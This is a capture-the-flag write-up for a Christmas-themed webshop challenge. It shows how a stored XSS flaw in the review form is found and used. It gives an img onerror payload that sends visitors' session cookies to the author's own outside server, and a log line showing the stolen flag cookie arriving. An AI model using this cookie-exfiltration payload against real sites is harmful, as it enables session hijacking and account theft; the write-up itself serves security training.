Challenge Description

Danish (original)

Velkommen til Det Nordiske Værksted

Frej har endelig fundet sin hjerteven, i hans helt egen webshop.

Det Nordiske Værksted er stedet, hvor kunder ikke bare køber julepynt, men også går på opdagelse i en verden af nordisk inspiration. Mange besøgende elsker at tage sig tid til at kigge rundt på siden, nyde udvalget og lade sig opsluge af stemningen.

Men er den helt sikker?

English (from chatgpt)

Welcome to The Nordic Workshop

Frej has finally found his heart’s companion, in his very own webshop.

The Nordic Workshop is the place where customers not only buy Christmas decorations but also explore a world of Nordic inspiration. Many visitors love to take their time browsing the site, enjoying the selection, and immersing themselves in the atmosphere.

But is it completely secure?

Solution

Going to the provided website (http://nordiskevaerksted.jul.fdca.dk:5000/), we are meet with a webshop:

More interesting though is the reviews (anmeldelser) since we can actually write something here that should be reflected for other users:

After some trial and error I found out that we can use XSS by using the onerror of an img tag (script dont work):

<img src=x onerror=alert(1);>

So lets try and steal a user’s session cookie by using the following payload1:

<img src=x onerror=document.location="https://osiriz.xyz/?c="+document.cookie;>

Looking at the access log we soon see the flag come in via the cookie exfil:

135.225.104.218 - "GET /?c=Flag=FDCA{N0gle_g4ng3_sk41_m4n_v3nt3}&%20visitor_id=c47192e3-4df9-4251-a4d1-b6282f4cb5b5 HTTP/2.0" 200

  1. I have used my website in this example, but tools like ngrok and python -m http.server could also be used. ↩︎